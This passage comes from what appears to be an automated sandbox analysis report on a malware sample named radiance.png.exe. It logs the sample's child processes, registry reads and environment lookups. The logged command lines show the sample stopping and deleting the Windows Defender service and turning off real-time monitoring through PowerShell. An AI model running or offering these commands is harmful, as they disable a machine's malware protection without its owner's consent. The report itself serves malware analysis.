| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
User (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Get Username | user_name_out = 2XC7u663GxWc |
|
10 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (125)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
116 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\2XC7u663GxWc |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\2XC7u663GxWc |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Process #8: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:45, Reason: Child Process |
| Unmonitor | End Time: 00:00:46, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xeb8 |
| Parent PID | 0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
EBC
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0xed0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49d60000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:21 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10896123 |
|
1 | |
| Get Time | type = Performance Ctr, time = 11918099119 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000005 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #9: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:45, Reason: Child Process |
| Unmonitor | End Time: 00:00:46, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed0 |
| Parent PID | 0xeb8 (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
ED4
0x
ED8
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0xc50000 |
|
1 |
Service (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:21 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10896186 |
|
1 | |
| Get Time | type = Performance Ctr, time = 11924134033 |
|
1 |
Process #10: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:46, Reason: Child Process |
| Unmonitor | End Time: 00:00:48, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xedc |
| Parent PID | 0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
EE0
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\sc.exe | os_pid = 0xf14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a830000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10897559 |
|
1 | |
| Get Time | type = Performance Ctr, time = 12060860401 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000005 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #11: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:46, Reason: Child Process |
| Unmonitor | End Time: 00:01:02, Reason: Self Terminated |
| Monitor Duration | 00:00:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xeec |
| Parent PID | 0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
EF0
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 144, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
